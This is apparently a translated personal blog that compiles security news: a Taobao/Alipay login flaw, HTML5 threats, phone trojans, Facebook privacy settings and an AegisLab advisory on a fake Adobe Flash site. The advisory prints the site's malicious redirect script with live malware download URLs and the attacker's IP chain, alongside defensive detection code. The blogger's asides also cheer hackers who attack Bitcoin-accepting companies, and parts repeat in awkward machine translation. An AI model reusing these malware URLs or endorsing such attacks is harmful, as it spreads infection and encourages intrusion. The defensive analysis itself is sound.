**Continued from the previous post of the 28th on the righteous "hacker" spirit: look at what happened after 'Alipay' and 'Taobao' made the greedy and evil "Bitcoin" a transaction currency!!! Who is really the "hacker" disrupting the economies of scale in the market!? Then, once more [as analysed before], the new generation of HTML5 being invaded by viruses without anyone noticing, and after that a look at how a small website really has been invaded by a virus... see the text below.**

*"Taobao and Alipay" confirmed to have a vulnerability: hackers can log in to any account and operate it!!*
2014-02-18 13:30 x0sec FreeBuf
(a hacker who prefers not to be named)

According to the well-known vulnerability reporting platform WooYun (烏云網), Taobao's security authentication mechanism has a flaw. Hackers can easily exploit it to log in to other people's Taobao/Alipay accounts and operate them. Anyone, without a password and simply through a search engine, can directly obtain other users' private data (account balance, transaction records, shipping address, name, mobile number and other sensitive information). It is not yet clear whether services such as Yu'e Bao are affected.

[People who are not greedy and not ill-intentioned would not trade in this "Bitcoin", which ignores and disrupts the rules of the real currency exchange market. Or perhaps some cunning people are "laundering dark money"!!? Otherwise, why disregard the fact that governments and the whole world reject "Bitcoin", and announce so loudly that you accept and use it? Is that not going against the right path??! So the "righteous" have appeared, to give your greedy and evil behaviour a warning!!! Is "justice versus evil" not simply the result of what people in the real world desire?!!]
Another vulnerability report, also from WooYun, says that a Taobao authentication flaw allows login to arbitrary Taobao accounts and Alipay. WooYun classifies the vulnerability type as "design flaw / logic error" and rates its severity as "high". At present the vulnerability is still waiting to be handled by the vendor. [cold snort]!!

Some netizens have even already used the vulnerability to log in to several Taobao accounts and posted screenshots as proof.
At present, Taobao and Alipay are investigating this vulnerability. If you find money missing from your Alipay account, you can call the customer service hotline 95188 and press 1 for enquiries or press 2 to freeze the account. If we receive further feedback from Alibaba, we will update this report promptly.

Update: Alibaba has responded that, after investigation, it confirmed this was a short-lived vulnerability caused by a recently introduced business rule. They have completed the fix and confirmed that no user suffered financial risk or loss because of this vulnerability.

[And they still insist that no user lost money. They will only learn to cry once "hackers" start paying them frequent visits!!]
----------------------------------------------------------------------------------------
**Next: "The new generation of HTML5: website security seen through its new features"**
[Original article: 新一代HTML5 從新功能談網站安全評估 ("New-generation HTML5: website security assessment seen through its new features"), Information Security 資安人科技網 http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=6874#ixzz2vK2fhL00]

HTML5 is the next major revision of HTML. To make multimedia, images and similar content easier to handle in web pages, it adds many syntactic features. It also adds new elements and attributes so that pages are easier for search engines to index, easier for visually impaired users to use, and better suited to small-screen devices.

Old problems and new threats both still need attention

HTML5 is maturing and is gradually replacing traditional Flash interaction. Used fully, it brings many benefits, including offline features, instant messaging, file and hardware support, semantics and multimedia. For example, when you use Gmail you can drag a file onto the page to attach it; that is one application of HTML5.

HTML5 is a new-generation content specification covering the Web, mobile platforms and e-books, and it is expected to become the mainstream content specification over the next few years. Contrary to the common impression, HTML5 not only carries the content specification of the previous version, HTML4, but also adds many new functions: drawing and audio/video on the content side; Storage on the storage side; Web Socket for communication and Web Worker for multitasking; and drag and drop and voice input on the interaction side (see the figure above). It can be called an epoch-making improvement that gathers everything in one, and a new trend that those who plan and implement systems cannot ignore. But new technology always brings new threats, and that could not be more apt for HTML5!

HTML5 security threats can be roughly divided into three categories:

1. Existing security problems that reappear in HTML5: the most common ones, cross-site scripting (XSS) and SQL injection, will continue to occur in the HTML5 era.

2. New problems derived from HTML5's new features: attack techniques implemented with the new functions HTML5 provides. Examples are storing XSS attack code and shell code in LocalStorage; HTML5-based botnets that use the Web Socket API for C&C (Command & Control) and data transfer; and using HTML5 to scan the internal network. In general, apart from e-mail attacks, getting into an internal network costs an attacker considerable effort, but with HTML5 a scan of the internal network can be launched while the user is simply browsing a web page. In addition, HTML5 can obtain GPS location data with the user's authorization, so user privacy is more easily exposed to risk.

3. New problems derived from new platforms: because HTML5 is the content specification for many new platforms and new browsers, many existing platforms and browsers have to update their versions and functions. New platforms mean more opportunities for weaknesses, especially when they must handle a content specification as feature-rich and variable as HTML5, so a new generation of security problems can be expected in new platforms and new browsers.
HTML5 website and source-code security is not yet mature [??]

Notably, current website-security and source-code-security solutions rarely include test and verification items for HTML5's new features. If your website already uses HTML5 content, or a site you use often has been upgraded to HTML5, the testing of its security functions is quite likely not yet fully assured. This is also one possible direction for the development of security tooling.

These attack techniques can be used for remote attacks on web servers, information gathering, establishing a remote command channel (remote shell), exposing sensitive information, web-based botnets, new ways of launching DDoS attacks on websites, and so on.
-------------------------------------------------
**Viruses play with phones too: an infected phone becomes a "bot" ("肉雞", literally "meat chicken")!!**

Now that smartphones are replaced and upgraded so quickly, mobile phone viruses have quietly entered people's digital lives!!

Do not underestimate mobile phone viruses. They lurk quietly, secretly drain your phone credit, and may steal your personal data; if you are not careful, the phone you use every day can become a "bot".

Viruses come "hard" and "soft"

Recently Ms. Li went away on a trip, but when she came home 5 days later she got a shock: her phone bill was as much as 400 yuan in arrears. At the service centre she checked her itemised bill and found that her phone had been exchanging nearly 20 text messages per minute with a number she did not know! Yet the phone showed no sent or received messages. After consulting professionals, Ms. Li learned that the phone had been infected by a Trojan, which made it send and receive text messages automatically and ran up the high charges.

On 20 January, the reporter asked Manager Zhang of the Hongqiao Telecom Tianyi Big World mobile phone after-sales service centre about the problem. He told the reporter that phone viruses are either "hard" or "soft". Generally, a hard virus is one that is already present when the phone leaves the factory; it works by using the phone's built-in software to "spend" and to steal information. A soft virus is malicious software which, like a computer virus, harms the user's interests; some make your phone automatically send large numbers of MMS messages and so produce high charges. "Phone Skull" (手機骷髏) is a fairly common soft virus at present: once infected, the phone automatically sends text messages to the numbers in the address book.

Another kind of phone virus is more frightening: it uploads the user's information, including text messages, call records and even the phone's location, to criminals or to a specific website. If the user's messages contain bank account numbers or other personal data, the consequences can be serious. Mr. Zhang said: "In short, once your phone is infected it may become a 'bot'. If a phone virus breaks out on a large scale, mobile internet speed as a whole will slow down too."

Smartphones are easily infected

So what kind of phone is easily infected? Mr. Li of Samsung's after-sales service company said: "Phone viruses usually infect smartphones. Like computer viruses, phone viruses need to spread through the system, and because smartphones are online more they are more easily infected. But this has nothing to do with which system the smartphone runs; any system can be infected."

"You cannot tell from a phone's appearance whether it is infected. For individuals, the main thing is still to check call and SMS usage often and see whether anything is abnormal," Manager Zhang said.

Related: three ways to keep your phone from becoming a "bot"

1). When your phone receives text messages, MMS, pictures or links of unknown origin, never open them casually.

2). Do not casually lend your phone, especially a smartphone, to others, to prevent malware from being installed. If the phone needs repair, it is best to take out the SIM card. Also, turn off Bluetooth and similar functions when they are not in use.

3). You can install anti-virus software on the smartphone and update it regularly. But note that anti-virus software lags behind the newest viruses, so you cannot rely on it entirely to stop every infection; you still need to check phone traffic and other usage regularly for anomalies.
-----------------------------------------------------------------------------
"A small website" and its computer-virus help board [Hong Kong]: a real case, see the link.

That forum is really poor. Which moderator told the owner of an infected computer that it was "just an adware virus"??!! We could only look askance (it felt laughable!). If you don't understand, you don't understand... heh. And the people there only care about saving face first!! Retribution from heaven has arrived!!
Experts, please click the link =
http://computer.uwants.com/forumdisplay.php?fid=1091
Do you see the many coloured posts from people asking for help removing viruses..!
A pity the people there are arrogant and conceited [beyond saving! Even the Buddha has closed his eyes to rest~]
Has anyone noticed that "its" HTML is moving slowly??
It has already been implanted with "serious virus code"!
The experts will surely know what it is = a secret that cannot be told! Haha..
===THE END===Melody.Blog~===>/
seriously Disclaimer: This blog is for knowledge sharing in the required software and who, after the download is complete, please delete files on round the clock. Do not miss think there is anything about "sex" or anything .- resulting in what message the people of color, but today I had to make a statement = do not leave "what's up?..".. not reply,& also bring you turned away. filthy sharer spirit!! 29 / 8.Thankyou! [Thanks of the BLOGGER TEAM~!]2014
Friday, 7 March 2014
**Knowledge sharing: shut out malicious behaviour by strengthening your Facebook privacy settings, so that annoying shopping groups cannot tag you!! Plus important information: beware of the fake, malicious Adobe website that is 100% lifelike and updated in sync! Security advisory 2014-02-27**
Many shopping fan pages that tag people have appeared on the wall, with shoes, clothes, bags and all sorts of other goods. The product photos carry a Line ID, but the most annoying thing is that they tag large numbers of people and keep showing up on your Facebook wall. Look closely and you will find that the people tagged in these photos were all tagged by "the same person" (see the figure below).

It turns out that the account of the person who tagged everyone in the photos was stolen. Once the attacker has taken over the account, it tags that person's friends in the photos of those shopping fan pages. AegisLab offers a simple walkthrough of a few settings here so that nobody is bothered by these shopping-page tags!

1). First, open "Timeline and Tagging" in your Facebook account settings. We will set two options: "Who can add things to my timeline?" and "How can I manage tags people add and tagging suggestions?"

2). Set "Who can add things to my timeline?"

Who can post on your timeline? This can be set to "Friends" or "Only Me". Set it to "Only Me" and you need not worry about a friend's stolen account posting on your wall!

Review posts friends tag you in before they appear on your timeline? This can be set to "Enabled" or "Disabled". Set it to "Enabled", so that every post that tags you must pass your review before it appears on your timeline.

3). Set "How can I manage tags people add and tagging suggestions?"

Review tags people add to your own posts before the tags appear on Facebook? This can be set to "Enabled" or "Disabled". Set it to "Enabled", so that when someone wants to tag you, the tag is allowed only after your review.

When you're tagged in a post, who do you want to add to the audience if they aren't already in it? This can be set to "Friends", "Only Me" or "Custom". Set it to "Only Me", so that when you are tagged in a post only you see that post and your friends do not.

Who sees tag suggestions when photos that look like you are uploaded? This can be set to "Friends" or "No One". Set it to "No One", so that no name-tag suggestion appears when a photo resembling you is uploaded.

Follow these steps and those annoying shopping groups will need your approval before they can tag you, and posts you are tagged in will be visible only to you, so your Facebook friends are not affected!

The above only strengthens your own privacy settings; the friends around you also need to know why these settings matter if the annoying advertising on Facebook walls is to decrease. These privacy settings only treat the symptoms; good usage habits and basic security awareness are the real cure!

How do you find out which Pages you have liked, and how do you unlike them?

1). Click "Activity Log".
2). Click "Likes", then "Pages and Interests".
3). Click the edit button at the top right of the Page entry to "Unlike" it or to report it.
------------------------------------------------------------------------
**More important information: beware of the fake, malicious Adobe website that is 100% lifelike and updated in sync! Security advisory 2014-02-27**

AegisLab recently discovered a malicious website: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html

We can see that this malicious js.html sits in the ckeditor directory inside cpanel.
cPanel is a back-end management system that lets you manage your website through web pages.
CKEditor is a WYSIWYG text editor used in web pages.
Vulnerabilities in these two components are reported from time to time:

cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 - Multiple Vulnerabilities = http://www.exploit-db.com/exploits/24530/

We suspect that a problem in these two components is what let the attacker place the malicious js.html in that directory.

This site first determines your browser type and version, operating system, IP, Flash version, Adobe Reader version and similar information, and then redirects you to a different URL to download a fake Flash Player installer. Part of the source code is shown below ↓

The malicious flow as tested by AegisLab:

hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null&IE_ActiveX=true

Finally, the fake Flash Player installer is downloaded:
hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
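As an added example (not AegisLab's or the blog author's code), the following JavaScript for Node.js shows how a defender could flag both request types from the chain above in proxy logs: the query that reports the visitor's browser and plugin versions, and an .exe named like a Flash Player installer served from a non-Adobe host. The threshold, the vendor domain list and the sample URLs are assumptions constructed for illustration.

```javascript
// Added example: flags logged URLs that resemble the two request types
// in the chain recorded above. Not code from AegisLab or the blog.

// Parameter names copied from the agent_save.php request shown on this page.
const INVENTORY_PARAMS = [
  "Browser_Type", "Browser_Version", "OS", "OS_Version", "Flash",
  "Shockwave", "Silverlight", "VLC", "WindowsMediaPlayer", "PDFReader",
  "AdobeReader", "DevalVR", "QuickTime", "RealPlayer", "IE_ActiveX",
].map((p) => p.toLowerCase());

// Assumptions of this example; tune them for your own logs.
const MIN_INVENTORY_HITS = 5;
const VENDOR_SUFFIXES = ["adobe.com", "macromedia.com"];

// Undo common IOC defanging (hxxp://, [.]) so the URL parser accepts the value.
function refang(raw) {
  return raw.trim().replace(/^hxxp/i, "http").replace(/\[\.\]/g, ".");
}

function parseLoggedUrl(raw) {
  try {
    return new URL(refang(raw));
  } catch (err) {
    return null;
  }
}

// Exact domain or a true subdomain only, so that "adobe.com.evil.example"
// and "notadobe.com" are not treated as the vendor.
function isVendorHost(hostname) {
  const host = hostname.toLowerCase().replace(/\.$/, "");
  return VENDOR_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// Number of distinct inventory parameters present in the query string.
function inventoryHits(url) {
  const seen = new Set();
  for (const key of url.searchParams.keys()) {
    const k = key.toLowerCase();
    if (INVENTORY_PARAMS.includes(k)) seen.add(k);
  }
  return seen.size;
}

function fileName(url) {
  const last = url.pathname.split("/").pop() || "";
  try {
    return decodeURIComponent(last).toLowerCase();
  } catch (err) {
    return last.toLowerCase(); // malformed %-escape: use the raw segment
  }
}

function isFlashInstallerFromOtherHost(url) {
  const name = fileName(url).replace(/[\s_-]+/g, "");
  return name.endsWith(".exe") && name.includes("flashplayer") &&
    !isVendorHost(url.hostname);
}

function classify(raw) {
  const url = parseLoggedUrl(raw);
  if (!url) return { raw, host: null, findings: ["unparseable"] };
  const findings = [];
  if (inventoryHits(url) >= MIN_INVENTORY_HITS) findings.push("plugin-inventory-beacon");
  if (isFlashInstallerFromOtherHost(url)) findings.push("flash-installer-non-vendor-host");
  return { raw, host: url.hostname, findings };
}

// Returns only the entries that produced at least one finding.
function scanLog(lines) {
  return lines.map(classify).filter((r) => r.findings.length > 0);
}

// Constructed sample URLs (documentation addresses and .example hosts).
const SAMPLE_LOG = [
  "hxxp://198.51.100.7/agent/agent_save.php?cr=x&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&Flash=11,5,502,146&AdobeReader=9,5,0,0&IE_ActiveX=true",
  "http://flash-update.example/download/Flash Player IE 11.9.9.exe",
  "http://adobe.com.flash-update.example/download/install_flashplayer12.exe",
  "https://download.adobe.com/flash/install_flashplayer.exe",
  "https://shop.example/search?OS=linux&q=flash+drive",
  "not a url",
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

The host check matters as much as the file name: the third sample uses a vendor-looking prefix on an unrelated domain, the same impression the lookalike download host on this page relies on.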
--------------------------------
This fake Flash Player is malware; its detection rate on VirusTotal: (23/48) =
https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/

Interestingly, the host of the final PE download URL, adobeflashupdate1.com, serves a page that looks exactly like the real thing. Is this really Adobe's official site??!!

The Adobe logo link at the top left also points to www.adobe.com, but a look at the page source reveals the truth!

It turns out that the page embeds www.adobe.com inside an iframe, which is why it looks exactly like Adobe's official website!!!

Detection rate of adobeflashupdate1.com on VirusTotal: (7/53) =
https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/

AegisLab WebGuard has added [D] adobeflashupdate1.com to its block rules; customers are reminded to keep their WebGuard signatures up to date!
**知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,
---> "讓你免於被惱人的購物社群標記~!!及 -重要資訊*請小心擬真度百分之百 -且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*
-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings
--- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-*Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!
===Sincerely === THE END === Melody.Blogger~===>/
---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*-
*請小心擬真度百分之百且同步更新的假Adobe惡意網站!--
--安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing -
" to exclude malicious human behavior < -
"Strengthening your Facebook privacy settings --- >
"Let your shopping community from being annoying tag ~ ! ! And , And important information-
* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*! *
*塗鴉牆上出現了不少標記人的購物粉絲團,
有鞋子、衣服、包包…等五花八門的商品,
這些商品照片上會有一個Line的ID
但是最討人厭的莫過於它標記了大量的人,
不斷的出現在你的Facebook塗鴉牆
仔細一看,可以發現這些照片上,
被標記的人都是由「同一個人」所標註(如下圖)*
*Graffiti on the wall , there were many people shopping
fan group labeled ,
There are shoes, clothes, bags ... and other sorts of goods,
These products have a Line of photo ID
But the most annoying than it marked a lot of people,
Constantly appear on your Facebook wall
A closer look , you can find these photos ,
People are marked by the " same person "
marked ( see below)*
*原來,是那個標註大家在相片裡的人帳號被盜了,
其帳號被駭客所竊取後,
即會將其朋友標記在那些購物粉絲團的照片中。
AegisLab在此提供幾個步驟的簡單設定教學,
讓大家免於受這些購物粉絲社群標記所擾!
1). 首先,開啟你Facebook個人帳戶設定中--
--的「動態時報與標籤」,
我們來設定「誰可以在我的動態時報新增貼文?」--
--和「我該如何管理別人加上的標籤以及標籤建議?」這2個選項吧!
*It turned out that labeling everyone who is in the photo where the account was stolen,
After his account was stolen by hackers ,
That will mark his friend in the photo in those shopping fan group .
AegisLab provides a simple set of teaching several steps in this ,
Let us immune to these shopping fan community marked by disturbed !
1 ) First, open your Facebook personal account settings -
- The "Dynamic Times and labels "
We set "Who can add postings in my timeline ? " -
- And " How do I manage other people 's labels and tags plus suggestions ? " This two options it !
*
*2). 設定「誰可以在我的動態時報新增貼文?」
誰可以在你的動態時報上發佈文章?
可以設定是「朋友」或「只限本人」。
設定為「只限本人」,不怕被盜帳號的朋友在你的塗鴉牆上發文了!
*2 ) Set "Who can add text posted on my timeline ? "
Who can publish articles on your timeline ?
You can set a " friend " or " Only I ."
Is set to " Only I ," not afraid of the stolen account your friends Posting a graffiti wall !
*審查朋友們把你標註在內的貼文,
是否要顯示在你的動態時報?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣標註你的貼文都必需透過你的審核,
才會顯示在你的動態時報。*Review your friends , including marked Posts ,
Do you want to appear in your timeline ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
Such labels are necessary for your postings through
your audit ,
Will appear in your timeline .
*3). 設定「我該如何管理別人加上的標籤以及標籤建議?」
標籤出現在 Facebook 之前,
先檢查別人貼在你貼文中的標籤?
可以設定為「啟用」或「關閉」。
設定為「啟用」,
這樣當有人要標記你時,
都必須經過你的審查,才會被允許標記。*3 ) Set " How do I manage other people 's labels and tags plus suggestions ? "
Labels appear before Facebook,
Someone posted on your first check the label affixed
to the text ?
Can be set to "Enable " or "off ."
Set "Enable" is ,
So that when someone wants to tag you,
You must go through the review , will be allowed tag.
*
*當你被標註在貼文中時,
如果你要分享的朋友還沒在分享對象中,
你想加誰到分享名單?
可以設定為「朋友」、「只限本人」或「自訂」。
設定為「只限本人」,
這樣當你被標註在貼文時,
只有你自己會看到該貼文,
不會讓你的朋友們看到。
*When you paste the text is marked in time ,
If you are not a friend to share in the sharing of objects ,
Do you want to add a list of who to share ?
Can be set to "Friends ," " Only I " or "Custom ."
Is set to " Only I "
So that when you paste the text is marked in time ,
Only you will see the postings ,
Do not let your friends see .
*
*在有看起來像你的相片被上傳後,
誰可以看到姓名標籤建議?
可以設定為「朋友」或「沒有人」。
設定為「沒有人」,
這樣當有與你相像的照片被上傳後,
便不會出現你的姓名標籤建議了。
*There looks like in your photo is uploaded,
Who can see the name tag suggestions ?
Can be set to "friends" or " no one ."
Is set to " nobody "
So that when you have similar photos are uploaded ,
Your name will not appear label suggested .
*
*只要照著以上這些步驟,
那些惱人的購物社群要標記你時,
都得經過你審核才行,
而你被標記的貼文也只有你會看到,
不會影響到你Facebook上的好友了!
以上只是加強自己本身的隱私設定,
還必須讓身邊的朋友也知道這些隱私設定的重要性,
才能減少Facebook塗鴉牆上那些惱人的廣告訊息。
這些隱私設定都只是「治標」,
良好的使用習慣和基本的資安意識才是「治本」喔!
如何知道自己對哪些專頁按過讚及如何取消?
*Just follow these steps
Those annoying when you want to mark shopping community ,
You had to go through an audit job ,
And you paste text marked only you will see ,
Does not affect you, your friends on Facebook !
These are just strengthen its own privacy settings ,
You must also let her friends know the importance of these privacy settings,
Facebook Graffiti on the wall in order to reduce those
annoying advertising messages .
These privacy settings are only " temporary "
Good habits and basic information security awareness
is the " cure " Oh !
How do I know what special page on pressed praise and
how to cancel ?
*1) Click "Activity Log".
*2) Click "Likes", then "Pages and Interests".
*3) Click the edit button at the upper right of the Page
to "Unlike" it or to report it.
------------------------------------------------------------------------
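**More important information to share: beware of a fake Adobe malicious site that looks 100% like the real one and stays in sync with it! Security advisory 2014-02-27**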
AegisLab recently found a malicious page: hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
As the path shows, this malicious js.html sits in the ckeditor directory under cpanel.
cPanel is a back-end management system that lets you administer your website through a web interface.
CKEditor is a WYSIWYG text editor used on web pages.
Vulnerabilities in these two components are reported from time to time:
*cPanel Security = https://cpanel.net/category/security/
CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html
CKEditor 4.0.1 - Multiple Vulnerabilities = http://www.exploit-db.com/exploits/24530/
We suspect that a problem in these two components
is what let the attacker plant the malicious js.html in that directory.
*The page first determines your browser type and version,
operating system, IP address, Flash version, Adobe Reader version and similar details,
then redirects you to one of several URLs to download a fake Flash Player installer.
Part of the source code follows:

```javascript
// Excerpt as published; `cr` is set elsewhere in the page and also appears
// as the cr= query parameter in the request chain.
// As captured, the left-hand operand of the first two tests is an empty string.
if ( "" == "Windows 8" ) {
    if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); }
    else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); }
    else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); }
    else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe" ); }
    else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); }
} else {
    if ( "" == "IE" ) {
        //alert("An update to your Adobe Flash Player is available");
        if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); }
        else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe" ); }
        else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe" ); }
        else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe" ); }
        else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); }
    } else {
        //alert("An update to your Adobe Flash Player is available");
        if ( cr == "sr" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe" ); }
        else if ( cr == "ils" ) { window.location.assign( "http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe" ); }
        else if ( cr == "ars" ) { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe" ); }
        else if ( cr == "ila" ) { window.location.assign( "http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe" ); }
        else { window.location.assign( "http://adobeflashupdates.com/download/FlashPlayer11.9.exe" ); }
    }
}
```

*The malicious flow as tested by AegisLab:
hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null&IE_ActiveX=true
The fake Flash Player installer downloaded at the end:
hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe
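The request chain above leaves two things a defender can look for in web proxy logs: a query string that enumerates installed plugins, and an .exe served under Adobe/Flash branding from a host Adobe does not own. The following is an added example, not AegisLab's code; the parameter names come from the agent_save.php request above, while the sample URLs, the threshold of four plugin keys and the one-entry vendor allow-list are assumptions made for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Plugin-inventory parameter names taken from the agent_save.php request above.
PLUGIN_KEYS = {"Flash", "Shockwave", "Silverlight", "VLC", "WindowsMediaPlayer",
               "PDFReader", "AdobeReader", "DevalVR", "QuickTime", "RealPlayer",
               "IE_ActiveX"}
BRAND_WORDS = ("adobe", "flash")    # brand strings a look-alike host borrows
VENDOR_DOMAINS = ("adobe.com",)     # assumption: only hosts trusted for this brand

def refang(url):
    """Make a defanged hxxp:// or hxxps:// indicator parseable again."""
    return "http" + url[4:] if url.lower().startswith("hxxp") else url

def is_vendor_host(host):
    """Exact match or true subdomain only, so adobe.com.cdn.example is rejected."""
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)

def classify(url):
    """Return the set of findings for one URL taken from a web proxy log."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    findings = set()
    # A query string that enumerates several plugins is a fingerprinting beacon.
    params = parse_qs(parts.query, keep_blank_values=True)
    if len(PLUGIN_KEYS.intersection(params)) >= 4:
        findings.add("plugin-fingerprint-beacon")
    # An .exe offered under the vendor's brand by a host the vendor does not own.
    filename = parts.path.rsplit("/", 1)[-1].lower()
    branded = any(w in host or w in filename for w in BRAND_WORDS)
    if filename.endswith(".exe") and branded and not is_vendor_host(host):
        findings.add("brand-lookalike-exe")
    return findings

# Constructed sample log entries (hosts and addresses are placeholders).
SAMPLE_URLS = [
    "hxxp://192.0.2.10/agent/agent_save.php?cr=x&Browser_Type=IE&Flash=11,5,502,146"
    "&Shockwave=null&Silverlight=null&AdobeReader=9,5,0,0&IE_ActiveX=true",
    "hxxp://adobeflashupdate.example/download/install_flashplayer.exe",
    "https://download.adobe.com/installers/flashplayer.exe",
    "https://adobe.com.cdn.example/tools/setup.exe",
]

def scan(urls):
    return {u: f for u in urls if (f := classify(u))}
```

Only the third sample URL passes clean; the fourth shows why the allow-list check must match on the domain suffix rather than on a substring.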
--------------------------------
*This fake Flash Player is malware; its detection rate on VirusTotal is 23/48:
https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
Interestingly,
the host in the URL of the PE file downloaded at the end,
adobeflashupdate1.com,
serves a page that looks exactly like the real thing.
Is this really an official Adobe site?!
*The Adobe logo link at the top left also points to www.adobe.com,
but a look at the page source reveals the truth!

```html
<html>
<body>
<iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0">
<p>Your browser does not support iframes.</p>
</iframe>
</body>
</html>
```

It turns out the page simply embeds an iframe of www.adobe.com,
which is why it looks exactly like Adobe's official site.
Detection rate of adobeflashupdate1.com on VirusTotal: 7/53 =
https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/
AegisLab WebGuard has added [D]adobeflashupdate1.com to its blocking rules;
customers are reminded to keep their WebGuard signatures up to date!
-----------------------------
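A crawler or URL sandbox can flag this kind of page from its HTML alone: the document has no content of its own and consists of one full-size iframe pointing at a different host. The following is an added example, not AegisLab's detection logic; the wrapper sample is the page source quoted above, while the second sample and all serving host names are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

STRUCTURAL = {"html", "head", "body", "meta"}   # tags that carry no visible content

class FrameScan(HTMLParser):
    """Record iframes and count any real content that sits outside them."""

    def __init__(self):
        super().__init__()
        self.frames = []      # (host, width, height) for each <iframe>
        self.skip = 0         # >0 while inside <iframe> fallback content or <title>
        self.outer_tags = 0   # non-structural tags outside any iframe
        self.outer_text = 0   # characters of visible text outside any iframe

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "title"):
            self.skip += 1
            if tag == "iframe":
                host = (urlsplit(a.get("src") or "").hostname or "").lower()
                self.frames.append((host, a.get("width"), a.get("height")))
        elif not self.skip and tag not in STRUCTURAL:
            self.outer_tags += 1

    def handle_endtag(self, tag):
        if tag in ("iframe", "title") and self.skip:
            self.skip -= 1

    def handle_data(self, data):
        if not self.skip:
            self.outer_text += len(data.strip())

def is_fullpage_wrapper(html, serving_host):
    """True if the page is nothing but a 100% x 100% iframe of another host's site."""
    scan = FrameScan()
    scan.feed(html)
    scan.close()
    own = serving_host.lower()
    foreign = [h for h, w, ht in scan.frames
               if h and h != own and not h.endswith("." + own)
               and w == "100%" and ht == "100%"]
    return bool(foreign) and scan.outer_tags == 0 and scan.outer_text == 0

# Page source quoted in the advisory above.
WRAPPER = ('<html><body><iframe src="http://www.adobe.com" width="100%" height="100%" '
           'frameBorder="0"><p>Your browser does not support iframes.</p></iframe>'
           '</body></html>')
# Constructed benign page: its own content plus a fixed-size embed.
NORMAL = ('<html><body><h1>Release notes</h1><p>Demo video:</p><iframe '
          'src="https://video.example/embed/1" width="560" height="315"></iframe>'
          '</body></html>')
```

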